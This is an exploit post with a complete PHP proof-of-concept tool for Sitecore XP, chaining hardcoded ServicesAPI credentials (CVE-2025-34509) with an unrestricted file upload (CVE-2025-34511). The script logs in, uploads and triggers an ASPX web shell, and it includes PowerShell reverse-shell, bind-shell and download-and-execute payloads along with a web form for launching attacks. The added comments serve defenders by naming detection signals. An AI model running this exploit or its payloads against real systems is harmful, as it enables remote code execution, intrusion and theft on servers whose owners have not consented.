=============================================================================================================================================
| # Title : Sitecore Experience Manager (XM) and Experience Platform (XP) v 10.1 File Upload & Hardcoded Credentials |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.sitecore.com/ |
=============================================================================================================================================
[+] Summary :
A critical remote code execution chain affecting Sitecore Experience Platform versions 10.0.0 through 10.4.x:
hardcoded credentials (CVE-2025-34509) are combined with an unrestricted file upload (CVE-2025-34511) to achieve complete system compromise.
[+] POC :
php poc.php or http://127.0.0.1/poc.php
<?php
/**
 * PoC client for the Sitecore XP/XM chain CVE-2025-34509 (hardcoded
 * ServicesAPI credentials on the identity server) + CVE-2025-34511
 * (unrestricted upload in the PowerShell Extensions upload handler).
 *
 * Every HTTP request goes through send_request(), so the paths, query
 * parameters and accounts referenced below are exactly the request
 * patterns a defender can alert on at the reverse proxy or in IIS logs.
 */
class SitecoreXPExploit {
private $target;       // hostname or IP, used verbatim by build_url()
private $port;
private $ssl;          // true => https scheme in build_url()
private $base_path;    // stored without its trailing slash
private $timeout;      // curl timeout in seconds, fixed at 30 by the constructor
private $cookies;      // name => value; every entry is sent on every request (see build_cookie_header())
private $is_logged;    // set once login_identitysrv() has succeeded
private $is_elevated;  // set once get_identity_cookies() has succeeded
private $webshell;     // random "<name>.aspx" chosen by upload_webshell()
private $item_uri;     // random folder segment chosen by upload_webshell()
/**
 * @param string $target    host name or IP of the Sitecore instance
 * @param int    $port      TCP port (default 443)
 * @param bool   $ssl       use https when true
 * @param string $base_path path prefix under which Sitecore is mounted; trailing '/' is stripped
 */
public function __construct($target, $port = 443, $ssl = true, $base_path = '/') {
$this->target = $target;
$this->port = $port;
$this->ssl = $ssl;
$this->base_path = rtrim($base_path, '/');
$this->timeout = 30;
$this->cookies = [];
$this->is_logged = false;
$this->is_elevated = false;
$this->webshell = null;
$this->item_uri = null;
}
/**
 * Non-destructive probe. Three steps: password-grant login as the built-in
 * ServicesAPI account, cookie elevation via /identity/connect/authorize, then
 * a GET against the PowerShell Extensions upload page. Nothing is uploaded.
 *
 * @return string "unknown" (login failed), "safe" (no cookies or no PSE upload page), or "vulnerable"
 */
public function check() {
echo "[*] Checking Sitecore XP vulnerability...\n";
// CVE-2025-34509: the ServicesAPI account with its hardcoded password. A token
// request for this username is the primary detection signal for this chain.
if (!$this->login_identitysrv('ServicesAPI', 'b')) {
echo "[-] Could not log in, application might not be Sitecore\n";
return "unknown";
}
$this->is_logged = true;
echo "[+] Successfully logged in with hardcoded credentials\n";
if (!$this->get_identity_cookies()) {
echo "[-] Could not get elevated cookies\n";
return "safe";
}
$this->is_elevated = true;
echo "[+] Obtained elevated cookies\n";
// Presence test only: a 200 from the PSE upload handler is taken as "module installed".
$res = $this->send_request(
'/sitecore%20modules/Shell/PowerShell/UploadFile/PowerShellUploadFile2.aspx',
'GET',
['hdl' => '1245516121']
);
if (!$res || $res['code'] != 200) {
echo "[-] PowerShell extension not detected\n";
return "safe";
}
echo "[+] ✓ PowerShell extension detected - target is vulnerable\n";
// get_version() returns the string "Unknown" rather than a falsy value when the
// regex misses, so this branch always prints.
$version = $this->get_version();
if ($version) {
echo "[+] Sitecore version: $version\n";
}
return "vulnerable";
}
/**
 * OAuth2 resource-owner-password grant against the Sitecore Identity Server
 * (/identity/connect/token) using the SitecoreShell client. On success the
 * access_token is stored in $this->cookies, which means it is also sent as a
 * Cookie named "access_token" on all later requests.
 *
 * @return bool true when a JSON body containing access_token came back with HTTP 200
 */
private function login_identitysrv($username, $password) {
$login_data = [
'username' => $username,
'password' => $password,
'grant_type' => 'password',
'scope' => 'openid profile sitecore.profile api offline_access',
'client_id' => 'SitecoreShell',
'client_secret' => 'secret'
];
$res = $this->send_request(
'/identity/connect/token',
'POST',
[],
http_build_query($login_data),
['Content-Type: application/x-www-form-urlencoded']
);
if ($res && $res['code'] == 200) {
$json = json_decode($res['body'], true);
if (isset($json['access_token'])) {
$this->cookies['access_token'] = $json['access_token'];
return true;
}
}
return false;
}
/**
 * Exchanges the bearer token for Sitecore session cookies by hitting the
 * authorize endpoint and scraping Set-Cookie headers from the expected 302.
 * The regex keeps only the first name=value pair of each Set-Cookie line;
 * attributes after the first ';' are dropped.
 *
 * @return bool true when the 302 carried at least one Set-Cookie header
 */
private function get_identity_cookies() {
$headers = [
'Authorization: Bearer ' . $this->cookies['access_token']
];
$res = $this->send_request(
'/identity/connect/authorize',
'GET',
[
'client_id' => 'SitecoreShell',
'scope' => 'openid profile sitecore.profile api offline_access',
'response_type' => 'code',
'redirect_uri' => $this->build_url('/sitecore/login?returnUrl=%2fsitecore'),
'state' => $this->random_text(10),
'nonce' => $this->random_text(10)
],
null,
$headers
);
// send_request() disables redirect following, so the 302 is visible here.
if ($res && $res['code'] == 302) {
if (preg_match_all('/Set-Cookie:\s*([^=]+)=([^;]+)/i', $res['headers'], $matches)) {
for ($i = 0; $i < count($matches[1]); $i++) {
$this->cookies[$matches[1][$i]] = $matches[2][$i];
}
return true;
}
}
return false;
}
/**
 * Best-effort version fingerprint from the /sitecore page body.
 *
 * @return string "major.minor.patch" when found, otherwise the literal "Unknown"
 */
private function get_version() {
$res = $this->send_request('/sitecore');
if ($res && $res['code'] == 200) {
// Try to extract version from page
if (preg_match('/Sitecore\s*([0-9]+\.[0-9]+\.[0-9]+)/i', $res['body'], $matches)) {
return $matches[1];
}
}
return "Unknown";
}
/**
 * CVE-2025-34511: hand-builds a multipart/form-data POST to
 * PowerShellUploadFile2.aspx carrying an .aspx file under a random folder
 * (ItemUri) and random file name. The resulting artifact on disk — a new
 * .aspx under the PowerShell UploadFile path — is what a responder should
 * hunt for. Note exploit() never forwards its payload arguments here, so the
 * shell is always built with generate_aspx_shell()'s default 'cmd' payload.
 *
 * @return bool true when the upload handler answered HTTP 200
 */
private function upload_webshell() {
$this->webshell = $this->random_text(15) . '.aspx';
$this->item_uri = $this->random_text(8);
$aspx_shell = $this->generate_aspx_shell();
$boundary = '----WebKitFormBoundary' . $this->random_text(16);
$data = "--{$boundary}\r\n";
$data .= "Content-Disposition: form-data; name=\"ItemUri\"\r\n\r\n";
$data .= "{$this->item_uri}\r\n";
$data .= "--{$boundary}\r\n";
$data .= "Content-Disposition: form-data; name=\"LanguageName\"\r\n\r\n";
$data .= "en\r\n";
$data .= "--{$boundary}\r\n";
$data .= "Content-Disposition: form-data; name=\"Overwrite\"\r\n\r\n";
$data .= "0\r\n";
$data .= "--{$boundary}\r\n";
$data .= "Content-Disposition: form-data; name=\"Unpack\"\r\n\r\n";
$data .= "0\r\n";
$data .= "--{$boundary}\r\n";
$data .= "Content-Disposition: form-data; name=\"Versioned\"\r\n\r\n";
$data .= "en\r\n";
$data .= "--{$boundary}\r\n";
// The file part is declared as text/plain even though the content is an ASPX page.
$data .= "Content-Disposition: form-data; name=\"{$this->item_uri}\"; filename=\"{$this->webshell}\"\r\n";
$data .= "Content-Type: text/plain\r\n\r\n";
$data .= $aspx_shell . "\r\n";
$data .= "--{$boundary}--\r\n";
// Content-Length is set explicitly here; curl also derives one from
// CURLOPT_POSTFIELDS — presumably the explicit header wins, verify if needed.
$headers = [
"Content-Type: multipart/form-data; boundary={$boundary}",
"Content-Length: " . strlen($data)
];
// send_request() appends the Cookie header itself as well, so it is sent twice.
$cookie_header = $this->build_cookie_header();
if ($cookie_header) {
$headers[] = $cookie_header;
}
$res = $this->send_request(
'/sitecore%20modules/Shell/PowerShell/UploadFile/PowerShellUploadFile2.aspx',
'POST',
['hdl' => '1245516121'],
$data,
$headers
);
return $res && $res['code'] == 200;
}
/**
 * Builds a single-file ASPX page whose Page_Load runs cmd.exe /c <command>
 * and writes the HTML-encoded output back. The command string is fixed at
 * build time (from generate_payload()); the page takes no request input.
 *
 * @return string ASPX source
 */
private function generate_aspx_shell($payload_type = 'cmd', $lhost = null, $lport = null) {
$command = $this->generate_payload($payload_type, $lhost, $lport);
$aspx = '<%@ Page Language="C#" %>';
$aspx .= '<%@ Import Namespace="System.Diagnostics" %>';
$aspx .= '<%@ Import Namespace="System.IO" %>';
$aspx .= '<script runat="server">';
$aspx .= 'void Page_Load(object sender, EventArgs e) {';
$aspx .= ' try {';
$aspx .= ' ProcessStartInfo psi = new ProcessStartInfo();';
$aspx .= ' psi.FileName = "cmd.exe";';
// addslashes() escapes quotes/backslashes for the C# string literal.
$aspx .= ' psi.Arguments = "/c ' . addslashes($command) . '";';
$aspx .= ' psi.RedirectStandardOutput = true;';
$aspx .= ' psi.UseShellExecute = false;';
$aspx .= ' Process p = Process.Start(psi);';
$aspx .= ' string output = p.StandardOutput.ReadToEnd();';
$aspx .= ' p.WaitForExit();';
$aspx .= ' Response.Write("<pre>" + Server.HtmlEncode(output) + "</pre>");';
$aspx .= ' } catch (Exception ex) {';
$aspx .= ' Response.Write("Error: " + Server.HtmlEncode(ex.Message));';
$aspx .= ' }';
$aspx .= '}';
$aspx .= '</script>';
return $aspx;
}
/**
 * Requests the uploaded page so IIS executes it. Returns true whenever any
 * HTTP response arrived, regardless of status code — it does not confirm
 * that the page actually ran.
 *
 * @return bool false when upload_webshell() has not run or no response came back
 */
private function trigger_webshell() {
if (!$this->webshell || !$this->item_uri) {
return false;
}
$res = $this->send_request(
"/sitecore%20modules/Shell/PowerShell/UploadFile/{$this->item_uri}/{$this->webshell}",
'GET'
);
return $res !== false;
}
/**
 * Full chain: login -> cookie elevation -> upload -> trigger. Login and
 * elevation are skipped when check() already performed them on this instance.
 * $payload_type/$lhost/$lport are accepted but not passed on to
 * upload_webshell(), so they have no effect as written.
 *
 * @return bool true when the uploaded page answered with any HTTP response
 */
public function exploit($payload_type = 'cmd', $lhost = null, $lport = null) {
echo "[*] Starting Sitecore XP exploitation...\n";
if (!$this->is_logged && !$this->login_identitysrv('ServicesAPI', 'b')) {
echo "[-] Failed to log in with hardcoded credentials\n";
return false;
}
$this->is_logged = true;
echo "[+] Logged in successfully\n";
if (!$this->is_elevated && !$this->get_identity_cookies()) {
echo "[-] Failed to get elevated cookies\n";
return false;
}
$this->is_elevated = true;
echo "[+] Obtained elevated cookies\n";
echo "[*] Uploading web shell...\n";
if (!$this->upload_webshell()) {
echo "[-] Failed to upload web shell\n";
return false;
}
echo "[+] Web shell uploaded: {$this->webshell}\n";
echo "[*] Triggering web shell execution...\n";
if ($this->trigger_webshell()) {
echo "[+] ✓ Web shell triggered successfully\n";
echo "[*] Check your listener for connection\n";
return true;
} else {
echo "[-] Failed to trigger web shell\n";
return false;
}
}
/**
 * Maps a payload type to the command string embedded in the ASPX page.
 * Each non-'cmd' type falls back to a recon command when its listener
 * arguments are missing; the 'meterpreter' branch hard-codes port 8080 and
 * the file name payload.ps1. Only the 'cmd' branch is reachable from
 * exploit() as written (see upload_webshell()).
 *
 * @return string Windows command line executed via cmd.exe /c
 */
private function generate_payload($type, $lhost, $lport) {
switch ($type) {
case 'reverse_shell':
if (!$lhost || !$lport) {
return 'whoami & hostname & ipconfig';
}
return "powershell -nop -c \"\$client = New-Object System.Net.Sockets.TCPClient('{$lhost}',{$lport});\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};\$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (pwd).Path + '> ');\$stream.Write(\$sendbytes,0,\$sendbytes.Length);while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);}\"";
case 'bind_shell':
if (!$lport) {
return 'whoami & hostname & systeminfo';
}
return "powershell -nop -c \"\$listener = New-Object System.Net.Sockets.TcpListener({$lport});\$listener.Start();while(\$true){\$client = \$listener.AcceptTcpClient();\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};\$data = \$stream.Read(\$bytes, 0, \$bytes.Length);\$input = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$data);\$sendback = (iex \$input 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);}\"";
case 'meterpreter':
if (!$lhost || !$lport) {
return 'whoami & hostname';
}
return "powershell -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://{$lhost}:8080/payload.ps1')\"";
case 'cmd':
default:
return 'whoami & hostname & ipconfig & dir C:\\';
}
}
/**
 * Thin curl wrapper. TLS verification is disabled, redirects are not
 * followed (callers inspect 302s themselves), and the raw response is split
 * into headers and body using CURLINFO_HEADER_SIZE.
 *
 * @param string      $path           path appended to base_path by build_url()
 * @param string      $method         HTTP verb, sent via CURLOPT_CUSTOMREQUEST
 * @param array       $params         query-string parameters, applied only for GET
 * @param string|null $data           raw POST body, applied only for POST
 * @param array       $custom_headers extra "Name: value" header lines
 * @return array|false ['code' => int, 'headers' => string, 'body' => string], or false when curl returned nothing
 */
private function send_request($path, $method = 'GET', $params = [], $data = null, $custom_headers = []) {
$url = $this->build_url($path);
if ($method == 'GET' && !empty($params)) {
$url .= '?' . http_build_query($params);
}
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_TIMEOUT => $this->timeout,
// Certificate and hostname checks are off: the PoC will talk to any TLS endpoint.
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
CURLOPT_HEADER => true,
CURLOPT_CUSTOMREQUEST => $method,
CURLOPT_FOLLOWLOCATION => false
]);
if ($method == 'POST' && $data) {
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
}
// The same User-Agent is also set as an explicit header; an explicit header
// in CURLOPT_HTTPHEADER takes precedence over CURLOPT_USERAGENT.
$headers = array_merge([
'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
], $custom_headers);
// Every stored cookie (including the bearer token saved as "access_token") rides along.
$cookie_header = $this->build_cookie_header();
if ($cookie_header) {
$headers[] = $cookie_header;
}
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($response) {
$header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
$headers = substr($response, 0, $header_size);
$body = substr($response, $header_size);
return [
'code' => $http_code,
'headers' => $headers,
'body' => $body
];
}
return false;
}
/**
 * Serialises $this->cookies into one "Cookie: a=b; c=d" header line.
 *
 * @return string|null null when no cookies are stored yet
 */
private function build_cookie_header() {
if (empty($this->cookies)) {
return null;
}
$cookie_parts = [];
foreach ($this->cookies as $name => $value) {
$cookie_parts[] = "{$name}={$value}";
}
return 'Cookie: ' . implode('; ', $cookie_parts);
}
/**
 * Random ASCII-letter string used for OAuth state/nonce, the multipart
 * boundary and the uploaded folder/file names. rand() is not a CSPRNG, so
 * these values are predictable; nothing here depends on them being secret.
 *
 * @param int $length number of characters
 * @return string
 */
private function random_text($length = 8) {
$chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
$result = '';
for ($i = 0; $i < $length; $i++) {
$result .= $chars[rand(0, strlen($chars) - 1)];
}
return $result;
}
/**
 * "scheme://target:port" + base_path + $path. $path is expected to start
 * with '/' because base_path has its trailing slash removed.
 *
 * @return string absolute URL
 */
private function build_url($path) {
$protocol = $this->ssl ? 'https' : 'http';
$full_path = $this->base_path . $path;
return "{$protocol}://{$this->target}:{$this->port}{$full_path}";
}
}
// Entry point. Two front-ends share SitecoreXPExploit: a CLI (when running
// under the cli SAPI) driven by getopt(), and a web form for any other SAPI.
// The web branch reads target/port/payload straight from $_POST with no
// authentication, so a copy of this file left reachable on a web server is
// itself an open attack relay — worth checking for when triaging a host.
if (php_sapi_name() === 'cli') {
echo "
╔══════════════════════════════════════════════════════════════╗
║ Sitecore XP RCE Exploit ║
║ CVE-2025-34511 & CVE-2025-34509 ║
║ PHP Implementation ║
╚══════════════════════════════════════════════════════════════╝
\n";
// Every short option is declared with ':' (value required), including s: and
// c:, whereas the long forms --ssl and --check are plain flags; the code
// below only tests for presence of either spelling.
$options = getopt("t:p:s:u:c:P:L:H:", [
"target:",
"port:",
"ssl",
"uri:",
"check",
"payload:",
"lhost:",
"lport:"
]);
$target = $options['t'] ?? $options['target'] ?? null;
$port = $options['p'] ?? $options['port'] ?? 443;
// TLS is off unless -s/--ssl is given, although the usage text below says "default: true".
$ssl = isset($options['s']) || isset($options['ssl']);
$base_uri = $options['u'] ?? $options['uri'] ?? '/';
$check_only = isset($options['c']) || isset($options['check']);
$payload_type = $options['P'] ?? $options['payload'] ?? 'cmd';
$lhost = $options['H'] ?? $options['lhost'] ?? null;
$lport = $options['L'] ?? $options['lport'] ?? 4444;
if (!$target) {
echo "Usage: php sitecore_exploit.php [options]\n";
echo "Options:\n";
echo " -t, --target Target host (required)\n";
echo " -p, --port Target port (default: 443)\n";
echo " -s, --ssl Use SSL (default: true)\n";
echo " -u, --uri Base URI path (default: /)\n";
echo " -c, --check Check only (don't exploit)\n";
echo " -P, --payload Payload type: cmd, reverse_shell, bind_shell, meterpreter (default: cmd)\n";
echo " -H, --lhost Listener host for reverse shell\n";
echo " -L, --lport Listener port for reverse shell (default: 4444)\n";
echo "\nExamples:\n";
echo " php sitecore_exploit.php -t 192.168.1.100 -c\n";
echo " php sitecore_exploit.php -t sitecore.company.com -P reverse_shell -H 10.0.0.5 -L 4444\n";
exit(1);
}
$exploit = new SitecoreXPExploit($target, $port, $ssl, $base_uri);
if ($check_only) {
// check() is the non-destructive path: login + cookie elevation + a GET probe, no upload.
$result = $exploit->check();
echo "\n[*] Result: {$result}\n";
} else {
if ($exploit->exploit($payload_type, $lhost, $lport)) {
echo "[+] Exploitation completed successfully\n";
} else {
echo "[-] Exploitation failed\n";
}
}
} else {
// Web front-end. The form below posts back to this same script; "action"
// selects check vs exploit and all other fields are taken as-is from $_POST.
$action = $_POST['action'] ?? '';
if ($action === 'check' || $action === 'exploit') {
$target = $_POST['target'] ?? '';
$port = $_POST['port'] ?? 443;
$ssl = isset($_POST['ssl']);
$base_uri = $_POST['uri'] ?? '/';
$payload_type = $_POST['payload_type'] ?? 'cmd';
$lhost = $_POST['lhost'] ?? '';
$lport = $_POST['lport'] ?? 4444;
if (empty($target)) {
echo "<div style='color: red; padding: 10px; border: 1px solid red; margin: 10px;'>Target host is required</div>";
} else {
$exploit = new SitecoreXPExploit($target, $port, $ssl, $base_uri);
// The class reports progress with echo; buffer it so it can be wrapped in <pre>.
ob_start();
if ($action === 'check') {
$exploit->check();
} else {
$exploit->exploit($payload_type, $lhost, $lport);
}
$output = ob_get_clean();
// $output is not HTML-escaped. As the class is written it contains only its
// fixed messages, random file names and regex-extracted version digits, so
// no request-controlled text is reflected here — re-check if that changes.
echo "<pre style='background: #f4f4f4; padding: 15px; border: 1px solid #ddd; border-radius: 4px;'>$output</pre>";
}
echo '<a href="' . htmlspecialchars($_SERVER['PHP_SELF']) . '" style="display: inline-block; padding: 10px 20px; background: #007cba; color: white; text-decoration: none; border-radius: 4px; margin: 10px 0;">Back to Form</a>';
} else {
// No action yet: render the static form (no CSRF token, no access control).
echo '<!DOCTYPE html>
<html>
<head>
<title>Sitecore XP RCE Exploit</title>
<meta charset="UTF-8">
<style>
body {
font-family: Arial, sans-serif;
margin: 0;
padding: 20px;
background: #f5f5f5;
}
.container {
max-width: 800px;
margin: 0 auto;
background: white;
padding: 30px;
border-radius: 8px;
box-shadow: 0 2px 10px rgba(0,0,0,0.1);
}
h1 {
color: #333;
border-bottom: 2px solid #007cba;
padding-bottom: 10px;
}
h3 {
color: #666;
}
.form-group {
margin-bottom: 20px;
}
label {
display: block;
margin-bottom: 8px;
font-weight: bold;
color: #333;
}
input[type="text"], select {
width: 100%;
padding: 10px;
border: 1px solid #ddd;
border-radius: 4px;
box-sizing: border-box;
font-size: 14px;
}
.checkbox-group {
display: flex;
align-items: center;
gap: 10px;
}
button {
background: #007cba;
color: white;
padding: 12px 25px;
border: none;
border-radius: 4px;
cursor: pointer;
margin-right: 10px;
font-size: 16px;
transition: background 0.3s;
}
button:hover {
background: #005a87;
}
.danger {
background: #dc3545;
}
.danger:hover {
background: #c82333;
}
.info {
background: #17a2b8;
}
.info:hover {
background: #138496;
}
.warning-box {
background: #fff3cd;
border: 1px solid #ffeaa7;
color: #856404;
padding: 15px;
border-radius: 4px;
margin: 20px 0;
}
.info-box {
background: #d1ecf1;
border: 1px solid #bee5eb;
color: #0c5460;
padding: 15px;
border-radius: 4px;
margin: 20px 0;
}
</style>
</head>
<body>
<div class="container">
<h1>Sitecore XP RCE Exploit</h1>
<h3>CVE-2025-34511 & CVE-2025-34509 - File Upload & Hardcoded Credentials</h3>
<div class="warning-box">
<strong> Educational Use Only:</strong> This tool demonstrates critical vulnerabilities in Sitecore XP.
Use only on systems you own or have explicit permission to test.
</div>
<form method="post">
<div class="form-group">
<label for="target">Target Host:</label>
<input type="text" id="target" name="target" placeholder="192.168.1.100 or sitecore.company.com" required>
</div>
<div class="form-group">
<label for="port">Port:</label>
<input type="text" id="port" name="port" value="443">
</div>
<div class="form-group">
<label for="uri">Base URI:</label>
<input type="text" id="uri" name="uri" value="/">
</div>
<div class="form-group">
<div class="checkbox-group">
<input type="checkbox" id="ssl" name="ssl" checked>
<label for="ssl" style="display: inline; font-weight: normal;">Use SSL</label>
</div>
</div>
<div class="form-group">
<label for="payload_type">Payload Type:</label>
<select id="payload_type" name="payload_type">
<option value="cmd">Test Command</option>
<option value="reverse_shell">Reverse Shell</option>
<option value="bind_shell">Bind Shell</option>
<option value="meterpreter">Meterpreter</option>
</select>
</div>
<div class="form-group">
<label for="lhost">Listener Host (for reverse shell):</label>
<input type="text" id="lhost" name="lhost" placeholder="Your IP address: 192.168.1.100">
</div>
<div class="form-group">
<label for="lport">Listener Port (for reverse shell):</label>
<input type="text" id="lport" name="lport" value="4444">
</div>
<button type="submit" name="action" value="check" class="info">Check Vulnerability</button>
<button type="submit" name="action" value="exploit" class="danger">Execute Exploit</button>
</form>
<div class="info-box">
<h3>About the CVEs:</h3>
<p><strong>CVE-2025-34509:</strong> Hardcoded credentials for ServicesAPI account (username: ServicesAPI, password: b)</p>
<p><strong>CVE-2025-34511:</strong> File upload vulnerability in PowerShell extensions</p>
<p><strong>Affected Versions:</strong> Sitecore XP 10.0.0 to 10.4.x</p>
<p><strong>Impact:</strong> Remote Code Execution via file upload</p>
<p><strong>Exploit Chain:</strong> Hardcoded Credentials → Authentication → File Upload → RCE</p>
</div>
</div>
</body>
</html>';
}
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================